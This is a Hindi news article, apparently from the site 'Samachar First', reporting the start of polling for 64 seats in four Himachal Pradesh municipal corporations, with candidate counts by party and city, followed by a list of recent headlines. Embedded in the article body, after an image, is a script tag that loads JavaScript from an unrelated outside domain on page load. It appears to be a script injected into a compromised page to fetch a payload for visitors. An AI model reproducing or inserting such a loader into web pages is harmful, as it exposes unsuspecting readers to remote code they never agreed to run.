Categories: हिमाचल

हिमाचल के चार नगर निगमों की 64 सीटों पर 271 उम्मीदवारों के भाग्य का फ़ैसला आज

<p>हिमाचल के चार नगर निगमों में मतदान शुरू हो गया है। हिमाचल की धर्मशाला सहित 3 नए नगर निगमों पालमपुर, मंडी और सोलन में सियासी संग्राम चल रहा है। धर्मशाला में कुल 17 सीट है। जिनके लिए कुल 80 उम्मीदवार चुनावी मैदान में हैं। जिसमें कांग्रेस व भाजपा सभी सीट पर चुनाव लड़ रही है। आम आदमी पार्टी 9 सीट पर चुनाव लड़ रही है। जबकि निर्दलीय 37 पर लड़ रहे है।</p>

<p>पालमपुर में कुल 15 नगर निगम की सीट पर चुनाव हो रहा है। इनपर 64 उम्मीदवार अपना भाग्य आजमा रहे हैं। भाजपा और कांग्रेस सभी 15 सीट पर अपने योद्धाओं के साथ मैदान में उतरी है। इसके अलावा पालमपुर में 7 सीट पर आम आदमी पार्टी और 27 निर्दलीय चुनाव लड़ रहे है। मुख्यमंत्री के गृह क्षेत्र मंडी में 15 नगर निगम की सीट पर 67 प्रत्याशी चुनावी मैदान में है। जिनमें कांग्रेस व भाजपा 15 सीटों पर चुनाव लड़ रही है। आम आदमी पार्टी यहां 13 सीट पर जबकि सीपीआईएम 2 सीट&nbsp; पर और 22 निर्दलीय चुनावी मैदान में डटे है।</p>

<p>सोलन में 17 नगर निगम की सीट है। जिनपर 60 उम्मीदवार अपनी किस्मत आजमा रहे है। कांग्रेस भाजपा सभी 17 सीटों पर चुनावी मैदान में जुटी हुई है। आप 14 सीट&nbsp; पर जबकि 12 निर्दलीय चुनाव लड़ रहे हैं। कुल मिलाकर बात करें तो&nbsp; भाजपा और कांग्रेस सभी 64 सीटों पर चुनाव लड़ रही है। 98 निर्दलीय चुनाव चुनावी मैदान में है। सीपीएम 2 और आप 43 सीट पर चुनाव लड़ रही है। चुनावों में 345 ने अपना नामांकन भरा था। जिनमें से 271 चुनावी मैदान में है। आज चार बजे तक मतदान के बाद वोटों की गिनती की जाएगी शाम तक परिणाम आ जाएंगे।</p>

<p><img src=”/media/gallery/images/image(2644).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

32 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

1 hour ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

2 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago